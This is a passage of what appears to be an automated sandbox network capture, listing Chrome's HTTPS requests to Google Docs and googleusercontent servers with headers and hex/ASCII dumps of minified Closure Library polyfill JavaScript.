                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 55 61 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 63 3d 5b 5d 2c 65 3d 61 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 5b 65 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3b 72 65 74 75 72 6e 20 63 7d 0a 7a 28 22 50 72 6f 6d 69 73 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 6b 29 7b 74 68 69 73 2e 67 3d 30 3b 74 68 69 73 2e 6c 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 6a 3d 5b 5d 3b 74 68 69 73 2e 76 3d 21 31 3b 76 61 72 20 6c 3d 74 68 69 73 2e 6f 28 29 3b 74 72 79 7b 6b 28 6c 2e 72 65 73 6f 6c 76 65 2c 6c 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6d 29 7b 6c 2e 72 65 6a 65 63 74 28 6d 29 7d 7d 66 75 6e 63 74
                                                                                        Data Ascii: turn a}function Ua(){for(var a=Number(this),c=[],e=a;e<arguments.length;e++)c[e-a]=arguments[e];return c}z("Promise",function(a){function c(k){this.g=0;this.l=void 0;this.j=[];this.v=!1;var l=this.o();try{k(l.resolve,l.reject)}catch(m){l.reject(m)}}funct
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 2e 4e 28 29 3b 74 68 69 73 2e 43 28 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 74 68 69 73 3b 67 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6b 2e 44 28 29 29 7b 76 61 72 20 6c 3d 4a 61 2e 63 6f 6e 73 6f 6c 65 3b 74 79 70 65 6f 66 20 6c 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 6c 2e 65 72 72 6f 72 28 6b 2e 6c 29 7d 7d 2c 31 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 44 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 76 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 6b 3d 4a 61 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 6c 3d 4a 61 2e 45 76 65 6e 74 2c 6d 3d 4a 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 74 79 70 65 6f 66 20 6d 3d 3d 3d 0a 22 75 6e 64 65 66 69 6e 65 64 22
                                                                                        Data Ascii: .N();this.C()};c.prototype.N=function(){var k=this;g(function(){if(k.D()){var l=Ja.console;typeof l!=="undefined"&&l.error(k.l)}},1)};c.prototype.D=function(){if(this.v)return!1;var k=Ja.CustomEvent,l=Ja.Event,m=Ja.dispatchEvent;if(typeof m==="undefined"
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 29 3b 72 65 74 75 72 6e 20 6d 2e 64 6f 6e 65 3f 66 28 5b 5d 29 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f 6e 28 70 2c 71 29 7b 66 75 6e 63 74 69 6f 6e 20 43 28 4f 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6f 61 29 7b 42 5b 4f 5d 3d 6f 61 3b 4a 2d 2d 3b 4a 3d 3d 30 26 26 70 28 42 29 7d 7d 76 61 72 20 42 3d 5b 5d 2c 4a 3d 30 3b 64 6f 20 42 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 4a 2b 2b 2c 66 28 6d 2e 76 61 6c 75 65 29 2e 4a 61 28 43 28 42 2e 6c 65 6e 67 74 68 2d 31 29 2c 71 29 2c 6d 3d 6c 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6d 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 63 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 56 61 28 61 2c 63 2c 65 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72
                                                                                        Data Ascii: );return m.done?f([]):new c(function(p,q){function C(O){return function(oa){B[O]=oa;J--;J==0&&p(B)}}var B=[],J=0;do B.push(void 0),J++,f(m.value).Ja(C(B.length-1),q),m=l.next();while(!m.done)})};return c});function Va(a,c,e){if(a==null)throw new TypeError
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 72 20 70 3d 4f 62 6a 65 63 74 5b 6d 5d 3b 70 26 26 28 4f 62 6a 65 63 74 5b 6d 5d 3d 66 75 6e 63 74 69 6f 6e 28 71 29 7b 69 66 28 71 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 72 65 74 75 72 6e 20 71 3b 4f 62 6a 65 63 74 2e 69 73 45 78 74 65 6e 73 69 62 6c 65 28 71 29 26 26 67 28 71 29 3b 72 65 74 75 72 6e 20 70 28 71 29 7d 29 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 21 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6d 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 70 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 71 3d 6e 65 77 20 61 28 5b 5b 6d 2c 0a 32 5d 2c 5b 70 2c 33 5d 5d 29 3b 69 66 28 71 2e 67 65 74 28 6d 29 21 3d 32 7c 7c 71 2e 67 65 74 28 70 29 21 3d 33 29 72 65 74 75 72 6e
                                                                                        Data Ascii: r p=Object[m];p&&(Object[m]=function(q){if(q instanceof e)return q;Object.isExtensible(q)&&g(q);return p(q)})}if(function(){if(!a||!Object.seal)return!1;try{var m=Object.seal({}),p=Object.seal({}),q=new a([[m,2],[p,3]]);if(q.get(m)!=2||q.get(p)!=3)return
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 6e 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 6e 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6d 3d 6e 65 77 20 61 28 44 28 5b 5b 6c 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6d 2e 67 65 74 28 6c 29 21 3d 22 73 22 7c 7c 6d 2e 73 69 7a 65 21 3d 31 7c 7c 6d 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6d 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6d 7c 7c 6d 2e 73 69 7a 65 21 3d 32
                                                                                        Data Ascii: ext()).done;)m=m.value,this.set(m[0],m[1])}}if(function(){if(!a||typeof a!=n||!a.prototype.entries||typeof Object.seal!=n)return!1;try{var l=Object.seal({x:4}),m=new a(D([[l,"s"]]));if(m.get(l)!="s"||m.size!=1||m.get({x:4})||m.set({x:4},"t")!=m||m.size!=2
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 29 2c 71 3b 21 28 71 3d 70 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 71 3d 71 2e 76 61 6c 75 65 2c 6c 2e 63 61 6c 6c 28 6d 2c 71 5b 31 5d 2c 71 5b 30 5d 2c 0a 74 68 69 73 29 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 67 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3b 76 61 72 20 6b 3d 30 3b 72 65 74 75 72 6e 20 67 7d 29 3b 0a 7a 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 68 69 73 2e 67 3d 6e 65 77 20 4d 61 70 3b 69 66 28 65 29 7b 65 3d 44 28 65 29 3b 66 6f 72 28 76 61 72 20 66 3b 21 28 66 3d 65 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 66 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e
                                                                                        Data Ascii: ),q;!(q=p.next()).done;)q=q.value,l.call(m,q[1],q[0],this)};g.prototype[Symbol.iterator]=g.prototype.entries;var k=0;return g});z("Set",function(a){function c(e){this.g=new Map;if(e){e=D(e);for(var f;!(f=e.next()).done;)this.add(f.value)}this.size=this.
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 3f 63 21 3d 3d 30 7c 7c 31 2f 63 3d 3d 3d 31 2f 65 3a 63 21 3d 3d 63 26 26 65 21 3d 3d 65 7d 7d 29 3b 0a 7a 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 65 29 7b 76 61 72 20 66 3d 74 68 69 73 3b 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 66 3d 53 74 72 69 6e 67 28 66 29 29 3b 76 61 72 20 67 3d 66 2e 6c 65 6e 67 74 68 3b 65 3d 65 7c 7c 30 3b 66 6f 72 28 65 3c 30 26 26 28 65 3d 4d 61 74 68 2e 6d 61 78 28 65 2b 67 2c 30 29 29 3b 65 3c 67 3b
                                                                                        Data Ascii: is",function(a){return a?a:function(c,e){return c===e?c!==0||1/c===1/e:c!==c&&e!==e}});z("Array.prototype.includes",function(a){return a?a:function(c,e){var f=this;f instanceof String&&(f=String(f));var g=f.length;e=e||0;for(e<0&&(e=Math.max(e+g,0));e<g;


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.1649716142.250.181.144436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:08 UTC706OUTGET /static/drawings/client/js/750391780-preview_integrated_core_integrated.js HTTP/1.1
                                                                                        Host: docs.google.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: NID=520=bd20F08T1lo0pJWzF4cXwN7lvaVTKd5GII5jnqWT8zGK8hczuK9dlMwXBz2ubkMzIW1ieuVMp0GD4YWcN1fiAbwdVwShhRHtZ4nvfTsVLx3wE3zVQ60wvcahxY_J6ywEi_agrvZnK-NxQNQNoVQVxGWED3MM51RA-HGGbXxKWhCJh0LKHRofNQQ
                                                                                        2024-12-18 01:10:09 UTC796INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/docs
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="docs"
                                                                                        Report-To: {"group":"docs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/docs"}]}
                                                                                        Content-Length: 143075
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: sffe
                                                                                        X-XSS-Protection: 0
                                                                                        Date: Wed, 18 Dec 2024 01:10:05 GMT
                                                                                        Expires: Thu, 18 Dec 2025 01:10:05 GMT
                                                                                        Cache-Control: public, max-age=31536000
                                                                                        Last-Modified: Tue, 17 Dec 2024 20:54:01 GMT
                                                                                        Content-Type: text/javascript
                                                                                        Vary: Accept-Encoding, Origin
                                                                                        Age: 3
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-12-18 01:10:09 UTC594INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 28 5b 5d 29 3b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 61 61 3d 22 45 64 67 65
                                                                                        Data Ascii: function _F_toggles_initialize(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]}_F_toggles_initialize([]);/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var aa="Edge
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 22 6e 65 75 72 6f 73 75 72 67 65 6f 6e 75 6e 64 65 72 67 6f 22 2c 72 3d 22 6e 75 6d 62 65 72 22 2c 75 3d 22 6f 62 6a 65 63 74 22 2c 78 61 3d 22 70 72 65 72 65 6e 64 65 72 22 2c 79 61 3d 22 73 65 76 65 72 69 74 79 22 2c 7a 61 3d 22 73 65 76 65 72 69 74 79 2d 75 6e 70 72 65 66 69 78 65 64 22 2c 77 3d 22 73 74 72 69 6e 67 22 2c 41 61 3d 22 73 75 63 63 65 73 73 22 2c 42 61 3d 22 74 72 75 65 22 2c 43 61 3d 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 44 61 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 45 61 28 61 29 7b 72 65 74 75 72 6e 20
                                                                                        Data Ascii: "neurosurgeonundergo",r="number",u="object",xa="prerender",ya="severity",za="severity-unprefixed",w="string",Aa="success",Ba="true",Ca="unhandledrejection";function Da(){return function(a){return a}}function x(){return function(){}}function Ea(a){return
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 72 28 76 61 72 20 63 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72 61 79 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 4a 61 5b 63 5b 65 5d 5d 3b 74 79 70 65 6f 66 20 66 3d 3d 3d 6e 26 26 74 79 70 65 6f 66 20 66 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 6e 26 26 48 61 28 66 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65
                                                                                        Data Ascii: r(var c="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),e=0;e<c.length;e++){var f=Ja[c[e]];typeof f===n&&typeof f.prototype[a]!=n&&Ha(f.prototype,a,{configurable:!0,writable
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 65 28 63 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 55 61 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 63 3d 5b 5d 2c 65 3d 61 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 5b 65 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3b 72 65 74 75 72 6e 20 63 7d 0a 7a 28 22 50 72 6f 6d 69 73 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 6b 29 7b 74 68 69 73 2e 67 3d 30 3b 74 68 69 73 2e 6c 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 6a 3d 5b 5d 3b 74 68 69 73 2e 76 3d 21 31 3b 76 61 72 20 6c 3d 74 68 69 73 2e 6f 28 29 3b 74 72 79 7b 6b 28 6c 2e 72 65 73 6f 6c 76 65 2c 6c 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6d 29 7b 6c 2e 72 65 6a 65 63 74 28 6d
                                                                                        Data Ascii: e(c));return a}function Ua(){for(var a=Number(this),c=[],e=a;e<arguments.length;e++)c[e-a]=arguments[e];return c}z("Promise",function(a){function c(k){this.g=0;this.l=void 0;this.j=[];this.v=!1;var l=this.o();try{k(l.resolve,l.reject)}catch(m){l.reject(m
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 3d 32 26 26 74 68 69 73 2e 4e 28 29 3b 74 68 69 73 2e 43 28 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 74 68 69 73 3b 67 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6b 2e 44 28 29 29 7b 76 61 72 20 6c 3d 4a 61 2e 63 6f 6e 73 6f 6c 65 3b 74 79 70 65 6f 66 20 6c 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 6c 2e 65 72 72 6f 72 28 6b 2e 6c 29 7d 7d 2c 31 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 44 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 76 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 6b 3d 4a 61 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 6c 3d 4a 61 2e 45 76 65 6e 74 2c 6d 3d 4a 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 74 79 70 65 6f 66 20 6d 3d 3d 3d 0a 22 75 6e
                                                                                        Data Ascii: =2&&this.N();this.C()};c.prototype.N=function(){var k=this;g(function(){if(k.D()){var l=Ja.console;typeof l!=="undefined"&&l.error(k.l)}},1)};c.prototype.D=function(){if(this.v)return!1;var k=Ja.CustomEvent,l=Ja.Event,m=Ja.dispatchEvent;if(typeof m==="un
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 3d 6c 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6d 2e 64 6f 6e 65 3f 66 28 5b 5d 29 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f 6e 28 70 2c 71 29 7b 66 75 6e 63 74 69 6f 6e 20 43 28 4f 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6f 61 29 7b 42 5b 4f 5d 3d 6f 61 3b 4a 2d 2d 3b 4a 3d 3d 30 26 26 70 28 42 29 7d 7d 76 61 72 20 42 3d 5b 5d 2c 4a 3d 30 3b 64 6f 20 42 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 4a 2b 2b 2c 66 28 6d 2e 76 61 6c 75 65 29 2e 4a 61 28 43 28 42 2e 6c 65 6e 67 74 68 2d 31 29 2c 71 29 2c 6d 3d 6c 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6d 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 63 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 56 61 28 61 2c 63 2c 65 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54
                                                                                        Data Ascii: =l.next();return m.done?f([]):new c(function(p,q){function C(O){return function(oa){B[O]=oa;J--;J==0&&p(B)}}var B=[],J=0;do B.push(void 0),J++,f(m.value).Ja(C(B.length-1),q),m=l.next();while(!m.done)})};return c});function Va(a,c,e){if(a==null)throw new T
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 20 68 28 6d 29 7b 76 61 72 20 70 3d 4f 62 6a 65 63 74 5b 6d 5d 3b 70 26 26 28 4f 62 6a 65 63 74 5b 6d 5d 3d 66 75 6e 63 74 69 6f 6e 28 71 29 7b 69 66 28 71 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 72 65 74 75 72 6e 20 71 3b 4f 62 6a 65 63 74 2e 69 73 45 78 74 65 6e 73 69 62 6c 65 28 71 29 26 26 67 28 71 29 3b 72 65 74 75 72 6e 20 70 28 71 29 7d 29 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 21 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6d 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 70 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 71 3d 6e 65 77 20 61 28 5b 5b 6d 2c 0a 32 5d 2c 5b 70 2c 33 5d 5d 29 3b 69 66 28 71 2e 67 65 74 28 6d 29 21 3d 32 7c 7c 71 2e 67 65 74 28 70 29 21 3d
                                                                                        Data Ascii: h(m){var p=Object[m];p&&(Object[m]=function(q){if(q instanceof e)return q;Object.isExtensible(q)&&g(q);return p(q)})}if(function(){if(!a||!Object.seal)return!1;try{var m=Object.seal({}),p=Object.seal({}),q=new a([[m,2],[p,3]]);if(q.get(m)!=2||q.get(p)!=
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 6e 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 6e 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6d 3d 6e 65 77 20 61 28 44 28 5b 5b 6c 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6d 2e 67 65 74 28 6c 29 21 3d 22 73 22 7c 7c 6d 2e 73 69 7a 65 21 3d 31 7c 7c 6d 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6d 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6d 7c 7c 6d
                                                                                        Data Ascii: ;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}}if(function(){if(!a||typeof a!=n||!a.prototype.entries||typeof Object.seal!=n)return!1;try{var l=Object.seal({x:4}),m=new a(D([[l,"s"]]));if(m.get(l)!="s"||m.size!=1||m.get({x:4})||m.set({x:4},"t")!=m||m
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 65 6e 74 72 69 65 73 28 29 2c 71 3b 21 28 71 3d 70 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 71 3d 71 2e 76 61 6c 75 65 2c 6c 2e 63 61 6c 6c 28 6d 2c 71 5b 31 5d 2c 71 5b 30 5d 2c 0a 74 68 69 73 29 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 67 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3b 76 61 72 20 6b 3d 30 3b 72 65 74 75 72 6e 20 67 7d 29 3b 0a 7a 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 68 69 73 2e 67 3d 6e 65 77 20 4d 61 70 3b 69 66 28 65 29 7b 65 3d 44 28 65 29 3b 66 6f 72 28 76 61 72 20 66 3b 21 28 66 3d 65 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 66 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69
                                                                                        Data Ascii: entries(),q;!(q=p.next()).done;)q=q.value,l.call(m,q[1],q[0],this)};g.prototype[Symbol.iterator]=g.prototype.entries;var k=0;return g});z("Set",function(a){function c(e){this.g=new Map;if(e){e=D(e);for(var f;!(f=e.next()).done;)this.add(f.value)}this.si
                                                                                        2024-12-18 01:10:09 UTC1390INData Raw: 22 4f 62 6a 65 63 74 2e 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 3f 63 21 3d 3d 30 7c 7c 31 2f 63 3d 3d 3d 31 2f 65 3a 63 21 3d 3d 63 26 26 65 21 3d 3d 65 7d 7d 29 3b 0a 7a 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 65 29 7b 76 61 72 20 66 3d 74 68 69 73 3b 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 66 3d 53 74 72 69 6e 67 28 66 29 29 3b 76 61 72 20 67 3d 66 2e 6c 65 6e 67 74 68 3b 65 3d 65 7c 7c 30 3b 66 6f 72 28 65 3c 30 26 26 28 65 3d 4d 61 74 68 2e 6d 61 78 28 65 2b 67 2c
                                                                                        Data Ascii: "Object.is",function(a){return a?a:function(c,e){return c===e?c!==0||1/c===1/e:c!==c&&e!==e}});z("Array.prototype.includes",function(a){return a?a:function(c,e){var f=this;f instanceof String&&(f=String(f));var g=f.length;e=e||0;for(e<0&&(e=Math.max(e+g,


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.1649718142.250.181.654436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:08 UTC1241OUTGET /drawingsz/AHiSRb2vRX9yRkhsvHGfazZ72MIvhHTEE29fzvFIJ2wLbLb48Na1ZuKYqByE7N05I4x14kPzvPGpPC-E1sHLmtMPSMYYZFjYQ1a2lQEOxRYu2NvG2foDaSN72Eozfhv4l2hEccw?key=psfCeKuvwgTVf-bOGgtgC0jY HTTP/1.1
                                                                                        Host: lh7-rt.googleusercontent.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Origin: https://docs.google.com
                                                                                        sec-ch-ua-mobile: ?0
